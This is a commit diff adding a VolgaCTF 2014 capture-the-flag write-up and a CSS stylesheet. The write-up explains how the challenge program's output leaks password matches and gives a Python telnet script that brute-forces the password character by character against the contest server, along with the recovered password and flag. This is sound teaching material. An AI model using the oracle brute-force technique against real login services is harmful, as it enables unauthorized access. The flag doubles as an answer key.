Added volgactf exp100 writeup and CSS

Author: Andrew Buss

Diff for: volga2014/index.html

@@ -155,6 +155,38 @@ <h2>Exploits 100</h2>
 write(fd, flag_buf, strlen(flag_buf) - 1);
 </code></pre>
 
-<p>This reads in a string one character at a time, then compares it to a password. For each character that matches, <code>v5</code> is incremented. Then, it does some processing on a random variable <code>v7</code> unless <code>v5</code> is zero, and prints out <code>v7</code>. There are several possible approaches to this problem. It might be possible to determine some information about <code>v5</code> given several values of <code>v7</code> for the same string, but that'd be pretty difficult. We can also perform a timing attack on the <code>v5</code> value.</p>
+<p>This reads in a string one character at a time, then compares it to a 12-character password. For each character that matches, <code>v5</code> is incremented. Then, it does some processing on a random variable <code>v7</code> unless <code>v5</code> is zero, and prints out <code>v7</code>. </p>
 
-<h1>unfinished, this'll be up in 30</h1>
+<p>There are several possible approaches to this problem. It might be possible to determine some information about <code>v5</code> given several values of <code>v7</code> for the same string, but that'd be pretty difficult. We can also perform a timing attack on the <code>v5</code> value, since iteration from 1 to <code>0xDEADBEEE</code> takes a significant amount of time. </p>
+
+<p>However, we noted that <code>v7</code> will always be less than 1000 unless <code>v5</code> is greater than zero, and that <code>v7</code> will almost certainly be larger than 1000 if <code>v5</code> is nonzero. We infer that if the value returned is greater than 1000, at least one character matched the password.</p>
+
+<p>So, we must first find a character that is not in the password. The string <code>'aaaaaaaaaaaa'</code> consistently returns numbers under 1000, so we can assume that <code>'a'</code> is not in the password. </p>
+
+<p>Then, we test the strings <code>'baaaaaaaaaaa'</code>, <code>'caaaaaaaaaaa'</code>, and so on until we receive a number greater than 1000 and advance to the next character. We used a script to automate this:</p>
+
+<pre><code>import telnetlib
+import time
+import string 
+
+# t = telnetlib.Telnet('127.0.0.1', 7026)
+t = telnetlib.Telnet('tasks.2014.volgactf.ru', 28111)
+t.read_until('characters\n')
+def try_password(pw):
+    print "trying", pw
+    t.write(pw+'\n')
+    return int(t.read_some(),16)
+
+cs = string.letters+string.punctuation+string.digits+' '
+a = ''
+for i in range(12):
+    for c in cs:
+        s = 'a'*(i)+c+'a'*(12-i-1)
+        if try_password(s) &gt; 1000:
+            a+=c
+            break
+
+print a
+</code></pre>
+
+<p>The password we extracted by this method was <code>S@nd_will2z0</code>, and providing this as the password returns the flag <code>Time_works_for_you</code>. Perhaps a timing attack was the intended solution?</p>

Diff for: volga2014/markdown8.css

@@ -0,0 +1,137 @@
+h1, h2, h3, h4, h5, h6, p, blockquote {
+   margin: 0;
+   padding: 0;
+}
+body {
+   font-family: "Helvetica Neue", Helvetica, "Hiragino Sans GB", Arial, sans-serif;
+   font-size: 13px;
+   line-height: 18px;
+   color: #737373;
+   background-color: white;
+   margin: 10px 13px 10px 13px;
+}
+table {
+   margin: 10px 0 15px 0;
+   border-collapse: collapse;
+}
+td,th {	
+   border: 1px solid #ddd;
+   padding: 3px 10px;
+}
+th {
+   padding: 5px 10px;	
+}
+
+a {
+   color: #0069d6;
+}
+a:hover {
+   color: #0050a3;
+   text-decoration: none;
+}
+a img {
+   border: none;
+}
+p {
+   margin-bottom: 9px;
+}
+
+h1, h2, h3, h4, h5, h6 {
+   color: #404040;
+   line-height: 36px;
+}
+h1 {
+   margin-bottom: 18px;
+   font-size: 30px;
+}
+h2 {
+   margin-top: 72px;
+   font-size: 24px;
+}
+h3 {
+   font-size: 18px;
+}
+h4 {
+   font-size: 16px;
+}
+h5 {
+   font-size: 14px;
+}
+h6 {
+   font-size: 13px;
+}
+hr {
+   margin: 0 0 19px;
+   border: 0;
+   border-bottom: 1px solid #ccc;
+}
+blockquote {
+   padding: 13px 13px 21px 15px;
+   margin-bottom: 18px;
+   font-family:georgia,serif;
+   font-style: italic;
+}
+blockquote:before {
+   content:"\201C";
+   font-size:40px;
+   margin-left:-10px;
+   font-family:georgia,serif;
+   color:#eee;
+}
+blockquote p {
+   font-size: 14px;
+   font-weight: 300;
+   line-height: 18px;
+   margin-bottom: 0;
+   font-style: italic;
+}
+code, pre {
+   font-family: Monaco, Andale Mono, Courier New, monospace;
+}
+code {
+   background-color: #fee9cc;
+   color: rgba(0, 0, 0, 0.75);
+   padding: 1px 3px;
+   font-size: 12px;
+   -webkit-border-radius: 3px;
+   -moz-border-radius: 3px;
+   border-radius: 3px;
+}
+pre {
+   display: block;
+   padding: 14px;
+   margin: 0 0 18px;
+   line-height: 16px;
+   font-size: 11px;
+   border: 1px solid #d9d9d9;
+   white-space: pre-wrap;
+   word-wrap: break-word;
+}
+pre code {
+   background-color: #fff;
+   color:#737373;
+   font-size: 11px;
+   padding: 0;
+}
+sup {
+   font-size: 0.83em;
+   vertical-align: super;
+   line-height: 0;
+}
+* {
+   -webkit-print-color-adjust: exact;
+}
+@media screen and (min-width: 914px) {
+   body {
+      width: 640px;
+      margin:10px auto;
+   }
+}
+@media print {
+   body,code,pre code,h1,h2,h3,h4,h5,h6 {
+      color: black;
+   }
+   table, pre {
+      page-break-inside: avoid;
+   }
+}

Diff for: volga2014/writeups.md

@@ -149,6 +149,37 @@ We are provided a binary and a host/port to connect to. The meat of the binary i
 	}
 	write(fd, flag_buf, strlen(flag_buf) - 1);
 
-This reads in a string one character at a time, then compares it to a password. For each character that matches, `v5` is incremented. Then, it does some processing on a random variable `v7` unless `v5` is zero, and prints out `v7`. There are several possible approaches to this problem. It might be possible to determine some information about `v5` given several values of `v7` for the same string, but that'd be pretty difficult. We can also perform a timing attack on the `v5` value.
+This reads in a string one character at a time, then compares it to a 12-character password. For each character that matches, `v5` is incremented. Then, it does some processing on a random variable `v7` unless `v5` is zero, and prints out `v7`. 
 
-# unfinished, this'll be up in 30
+There are several possible approaches to this problem. It might be possible to determine some information about `v5` given several values of `v7` for the same string, but that'd be pretty difficult. We can also perform a timing attack on the `v5` value, since iteration from 1 to `0xDEADBEEE` takes a significant amount of time. 
+
+However, we noted that `v7` will always be less than 1000 unless `v5` is greater than zero, and that `v7` will almost certainly be larger than 1000 if `v5` is nonzero. We infer that if the value returned is greater than 1000, at least one character matched the password.
+
+So, we must first find a character that is not in the password. The string `'aaaaaaaaaaaa'` consistently returns numbers under 1000, so we can assume that `'a'` is not in the password. 
+
+Then, we test the strings `'baaaaaaaaaaa'`, `'caaaaaaaaaaa'`, and so on until we receive a number greater than 1000 and advance to the next character. We used a script to automate this:
+
+	import telnetlib
+	import time
+	import string 
+
+	# t = telnetlib.Telnet('127.0.0.1', 7026)
+	t = telnetlib.Telnet('tasks.2014.volgactf.ru', 28111)
+	t.read_until('characters\n')
+	def try_password(pw):
+		print "trying", pw
+		t.write(pw+'\n')
+		return int(t.read_some(),16)
+
+	cs = string.letters+string.punctuation+string.digits+' '
+	a = ''
+	for i in range(12):
+		for c in cs:
+			s = 'a'*(i)+c+'a'*(12-i-1)
+			if try_password(s) > 1000:
+				a+=c
+				break
+
+	print a
+
+The password we extracted by this method was `S@nd_will2z0`, and providing this as the password returns the flag `Time_works_for_you`. Perhaps a timing attack was the intended solution?